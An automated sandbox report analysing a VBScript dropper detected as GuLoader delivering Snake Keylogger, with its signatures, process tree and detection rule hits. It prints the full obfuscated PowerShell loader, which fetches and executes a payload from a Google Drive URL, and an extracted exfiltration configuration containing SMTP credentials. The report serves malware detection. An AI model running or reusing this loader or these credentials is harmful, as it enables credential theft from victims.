Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RFQ_64182MR_PDF.R00.vbs

Overview

General Information

Sample name:RFQ_64182MR_PDF.R00.vbs
Analysis ID:1540842
MD5:63a5b7d958f537744c5330b3fef8ccac
SHA1:00ba79f887c403afabdd6ffe21db30e82288f84b
SHA256:ee763e48dad8e005251345990a572ccbf15929e76c5fa68ab3d1fc80ef7e5286
Tags:vbsuser-abuse_ch
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Early bird code injection technique detected
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
VBScript performs obfuscated calls to suspicious functions
Yara detected GuLoader
Yara detected Powershell download and execute
Yara detected Snake Keylogger
AI detected suspicious sample
Found suspicious powershell code related to unpacking or dynamic code loading
Queues an APC in another process (thread injection)
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Java / VBScript file with very long strings (likely obfuscated code)
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Msiexec Initiated Connection
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 2032 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_64182MR_PDF.R00.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 3300 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;" MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 2060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • powershell.exe (PID: 5432 cmdline: "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= Coar$RemusEEn.rvNTransvsan.s:Gtebaa SikkpP ethPDi pedPunteAStunnTforlgABackn+Sekul$.romaK,ermuOHazanNGreevtIndvaARiob,gCymbeIGenfoSTraum ');Forbindingers (Franarrendes 'Cuisi$C,liiGlingeL aradO.ommebwhip aReboulLabio: FriglDatasILobelTCurt hfrygtOti.anP Brn hJeq eI FlyvlrussiORektou eskysSkudd=Be ry$Sabr dyokeaeLachrlKie,eGArbejgTergiE FrazL IrrusInquieArt iS.orma.Maghissm gepIndviLU affISaddutLden.(Rea i$Tr,ckczigzaOUdestlKar oe ieclOlaspePPelortRegnlEBaronrNatioO CereIKogendPark,) Inct ');Forbindingers (Franarrendes 'Hu,ba[ ,nteN lassE GuiltPedan.inse.sEnergEH vedrGnistvDivi.iIn,rtCUngd efortipFun,oO AffaICloamnCompitEpichmBugh AB.rneNBarquaNonutG AltaEAnaerrUnpro]Arbej: vndg: LumbSSparsERentec ,nteu SemirWigeoI SlukTchokiy Mu kPGolemRSpe cOKinoeT K nkOfloodc StbnoReserl Behe F lig=Overr Betle[ ArienN kvrERe tetLicen.Konios .tesEIcineCS.mmeURedupr stopIGom,hTHusfayTi sfPCountRR gisOArnawtDioptOTegnscBrnehoErgaslPaasatRe onyInddapCockce onpo] Pl t:Disco:S ridtgeorglEfterSKon,a1.ingu2 Ata ');$Delggelses=$Lithophilous[0];$Fitted=(Franarrendes 'S dde$Lisbeg Keralstac OAs albNorlaaOr inL imse:DocerNG,udeeUnfaiOFlameP Sladr Udl,EMiljpNqua re anka=DipsonStolpE rojeW Stil-photoOSukkebDescrjLys aeWheywCNedn thove .oncrsCheckyKov,rsPericT.reteEE.onoMCorro.SubauNAresfEPyro tSethe.RaddyW,rhneegramsbHov rCAxin LDomiciSpidsEPe,olN sup,T era ');Forbindingers ($Fitted);Forbindingers (Franarrendes 'Scirr$Fa csNCircueForsooKaliupSpaltrM ulde SkatnTeleoe Pans. OsmoHAgendeGifteaSuprad UdfreDissir herisDiabo[Sce e$DefmrRJaw meskuregUnc lnF uoreJingktTranseKubisgWoodsnAgrope sem tKvili]Forti=Badmi$yaccrMHovedoV,ndsdAvi.uuBisselFuldfaTildarHornhiFremstExpone verdtFingee obbinSem.o8 urbo5Taktr ');$Behoovings=Franarrendes ',orde$M.tchN HylieAmireoSinknpBifolrAi,boeRap fnWarsteEnosi.pai,cDTokyooQui cwTmme nSma fl EnteoL ucoaNarkod LnkoFHectoiSelvhlHav aeRandd( Quan$ Ad,pDbudcye DisplUntragLabang Sna eLovovlNapoosDe pneTub rs Deli,Satyr$BymllB etalFasc iRullenBrn,hdSkud.iOecussdagplmKrigs)S.rpu ';$Blindism=$Decarbonylated;Forbindingers (Franarrendes 'Heron$ skrogSeptiL.remeO orgeb Gr.vAAnt.tLAporo:BrnephAssafaTepotnRef eRAnde EDeeskjdykkeEFor lRForvaNEneanEGrisbsSvamp=Freet(Spi dTLaereeUlidesIndefTnybru-Maa ePFuscoaP.rret DeadHKjepl Eks.l$ MacrbHansalSmuttIOutsmnSyst.dEpisiIAntepsRecutMFestd) Bann ');while (!$hanrejernes) {Forbindingers (Franarrendes 'Salpa$St erg ygnilWindooHerbobLektua uretlDisqu:CelebP BrndiB,gatgTrakegDrabsiIchthn.aadlgIia,a4 My t4Kultu=Foraa$ ronvtHieror S yeuS ksueNybeg ') ;Forbindingers $Behoovings;Forbindingers (Franarrendes 'PapliSBr,ckTudtryaBremsrLivreTTerma-BegynSCyn cLRoshaeennuyEOphthPd bbe E.fre4Finda ');Forbindingers (Franarrendes 'Rolli$Diatogpalatlvelo.OS rmubSommeaBlgeblBeliq: Ste hPlanlALarvenRnnebR.jeneE BiggjUrtileAmtssRDe abN rhveEAcerbSPopul=,lens(SnuskTLseliE,ercuSGrandt ngul-Aftr,pGaffea aadfTGalenH Akkl Spros$ OptrBMskinLDrhamIGnomoNFantodUnlowiUnempsTermomTalpa)Obl,t ') ;Forbindingers (Franarrendes 'Chlor$Go pegForekL L,jeOA,eyaBChaseA Ska.LDespo: RepabFoderAA pensAndentX,nthINumdaNUbetvg BeskSVandp= Ravn$St rvgKatteLBrunjoSubplBRe oma ndkl S.ek:MautdKAutaeuTillagB jublpr paEProbasSpid + Ble +Numau%Pha d$StbelLPap.gIpha nT Idioh OpreoSlumrPFruerHBlundI oviel VegeOSkoleUunjokSI ter.Subadc ippeOSkrivUVr tjNKommetUdsty ') ;$Delggelses=$Lithophilous[$Bastings];}$Gospels=307653;$Flapr2=30753;Forbindingers (Franarrendes ' Trin$MuntiGB nkoL SlagoS mspBPerleA EolilDiss :khmerbFototLStockNgemalD Aga,eAfvastRabar Faks=Ski,n RadikGAegy.eDiskutE rre-Skrifcnin tOGyngeN PromtPyurie,mokenWatert Prog bloms$ InteBPeriolAmalgiConduNForkidKodesIGrammSAu orm .egi ');Forbindingers (Franarrendes ',leva$BlokogMeterlLovbuovigerb,pildaC lmilPinac:OddfeFFilteeTerebuDichodMilieaskankloutlilSemicyUndis Khub=Ga,in Macar[CheerSSelvbydecors Korrt supeeHydrom Cove.WooshC .andoS,bbrn RajavGu dsePortlr TnkstEncla]Sprng:Grupp:BraceFUngrarBrorso Brd mGen,nBResulajewedsStandeSt aa6,dsun4SkulpSDexamtDeagorKviksi ZappnForl gLumba(,rain$S ldyBLactal aflgnUdflud,urroeK llitHa.vl)sjofl ');Forbindingers (Franarrendes 'Bortv$E icaGraadslKuedeOOverpBWeirdASuperlUdh n:KnurrbPu.dlyG vltCAu olY Ov rKInforlDel.ae DehyRKlumrnExterE M.la Blues=Biref Popli[gid.nsD speYSwaggs etekTW eelEBlotcMMesot.Har etembate.redex R.lat Long.Sa chE BaanN G,oacBe stOBra,yDFst.nIFriz nC.scag,ncon] Ambr:Diako:r,annASammeSdengacF rarI Eksei Cond.preadGLofteESeksetAn ensApiartWaurar Te.hIRev,lN BiobgBrand(Goute$V nstf AuriEsexo.UPlastDTekstaImplilDerayLK ordYResee)Lagen ');Forbindingers (Franarrendes 'Unre $SubfoGE ektL,elenoMunkeb.urriA AyyuL .urs:N nocBUnsmoaSedatJ Ung.E udb,r ugtiePhot.sPyga.=D ndr$ P.ocbCalymYGuldfCF,rniyTinelK,rimaLSarcoequincrPalaeNFrgemERkebi.Y.elsSDekolU Florbc.resSTeks tStraaRSkadeIStorsN,lixiGBrack(Homos$Ke atGVers ODowcoS Hu pP incoEMaa eLNodesSfornu,Nepal$ drifFFondalKaramAAf elp InelROv rl2In,iv) Juve ');Forbindingers $Bajeres;" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
    • conhost.exe (PID: 3696 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • msiexec.exe (PID: 5496 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "rajan@recsb.com", "Password": "1=vI*r6^", "Host": "mail.recsb.com", "Port": "587", "Version": "4.4"}
SourceRuleDescriptionAuthorStrings
00000008.00000002.2988377794.00000000242C1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
    00000008.00000002.2988377794.00000000243C9000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000006.00000002.2184830111.0000000008800000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
        00000006.00000002.2169361700.00000000059A6000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_GuLoader_5Yara detected GuLoaderJoe Security
          00000006.00000002.2185161641.000000000B0D5000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
            Click to see the 5 entries
            SourceRuleDescriptionAuthorStrings
            amsi64_3300.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
              amsi64_3300.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0x10073:$b2: ::FromBase64String(
              • 0xd409:$s1: -join
              • 0x6bb5:$s4: +=
              • 0x6c77:$s4: +=
              • 0xae9e:$s4: +=
              • 0xcfbb:$s4: +=
              • 0xd2a5:$s4: +=
              • 0xd3eb:$s4: +=
              • 0xf791:$s4: +=
              • 0xf811:$s4: +=
              • 0xf8d7:$s4: +=
              • 0xf957:$s4: +=
              • 0xfb2d:$s4: +=
              • 0xfbb1:$s4: +=
              • 0xdc32:$e4: Get-WmiObject
              • 0xde21:$e4: Get-Process
              • 0xde79:$e4: Start-Process
              amsi32_5432.amsi.csvINDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXECDetects PowerShell scripts containing patterns of base64 encoded files, concatenation and executionditekSHen
              • 0xac1c:$b2: ::FromBase64String(
              • 0x9ca1:$s1: -join
              • 0x344d:$s4: +=
              • 0x350f:$s4: +=
              • 0x7736:$s4: +=
              • 0x9853:$s4: +=
              • 0x9b3d:$s4: +=
              • 0x9c83:$s4: +=
              • 0x13ddf:$s4: +=
              • 0x13e5f:$s4: +=
              • 0x13f25:$s4: +=
              • 0x13fa5:$s4: +=
              • 0x1417b:$s4: +=
              • 0x141ff:$s4: +=
              • 0xa4ca:$e4: Get-WmiObject
              • 0xa6b9:$e4: Get-Process
              • 0xa711:$e4: Start-Process
              • 0x14a46:$e4: Get-Process

              System Summary

              barindex
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_64182MR_PDF.R00.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_64182MR_PDF.R00.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_64182MR_PDF.R00.vbs", ProcessId: 2032, ProcessName: wscript.exe
              Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 216.58.206.78, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 5496, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49741
              Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_64182MR_PDF.R00.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_64182MR_PDF.R00.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 2580, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\RFQ_64182MR_PDF.R00.vbs", ProcessId: 2032, ProcessName: wscript.exe
              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Besprjtet Playstow Stunsail Vrangforestillingers ergotisms Idealism Overthrowing #>;$Requestionerntrenchant='Gem';<#Formanings Reaktion Randmorner Backwall protore #>;$Oplyser=$Syriacism+$host.UI; function Franarrendes($Kampucheanske){If ($Oplyser) {$Grangerizer++;}$Automobiler=$Forsnakket+$Kampucheanske.'Length'-$Grangerizer; for( $Requestioner=5;$Requestioner -lt $Automobiler;$Requestioner+=6){$Heavenward214=$Requestioner;$Ressentimentsflelsers+=$Kampucheanske[$Requestioner];$Spindleshanks='Nougatfarvede255';}$Ressentimentsflelsers;}function Forbindingers($Sweateren){ . ($Leukophoresis) ($Sweateren);}$Modulariteten85=Franarrendes 'Rum eM lunnoNo anzKonkui Zircl Enerl AnnaaOffgo/ Expe ';$Modulariteten85+=Franarrendes 'Forha5Genn..Olief0Munde Qeth(kamleWD speiW.rlonIag tdGrundoTyd.lwNordis.inds St rN UndeTVolun Aphyl1Found0Orrtr. Fart0Dunel;Attem roomW.ettiiKonomnRe dd6 Anab4 Ach ; Tand S.mpsxChamp6Torve4Snkni;N.mph Carbor Vaa vUnder:forby1Agnat3Foreb1Hydro. nond0 M ga)Bolig FilmsG B koeSviencM notkDesmooBet t/Sp ci2Disfo0Frak,1Curvi0klim 0Enfol1Na ur0 Fops1 Sni TandpF mageisobrarAftrae,ofanf IndioInvarxSaftf/Skole1Sky r3Yderp1 Para.adven0Fall ';$Regnetegnet=Franarrendes 'NiffeU SonoSPreleEStamsrLoz n-FrontAVideoGPo.uleDi denFejletNowel ';$Delggelses=Franarrendes 'BrookhTsnintUnpertunasspOdon sCentr: aan/ Bygn/Pr.grdD,sgerUdnytiFlsomv Non eWoods.OmheggDhurroSkr aoInflegHelpilH lefeLinne.photocNo.gao iphom varm/Avl.suRebubc Abru?I.kvieKomp,xKo tep.piskoOver rBriskt En e=Prosed fvnnounig,wBu.den Fjenl ArusoCen raSaggidRet r&Klenei OmvedDof m= ktio1SaltiO emouB.otlcBac sV EmulAAppetKPseu,uRespicPugenyTim rFCrocugAnkomsKlemry verslS,jlgES ewa0Aaref-F remRKendiUOnla 3Wa rguElvilZ Klbnk DiffN SdnidBog,veSemid2 .emia.ittelsyfilM SemiJUne lPOmdig ';$Coleopteroid=Franarrendes 'Coff >Disge ';$Leukophoresis=Franarrendes 'V,ticiWoundECi.enxSynon ';$Requestionernkassoerne='Papyroplastics';$Kontagis='\Platyhelminthic195.End';Forbindingers (Franarrendes 'Knivs$SpiseGG ssel SkijoL,nkbBRa ziA RemrlD.gab: V,ewDChinbe AcuicY,lloaPeachRSnoenbRhabdoMen oN Mi.tYantihl Sta.aFavo.TU stoESystedDextr= 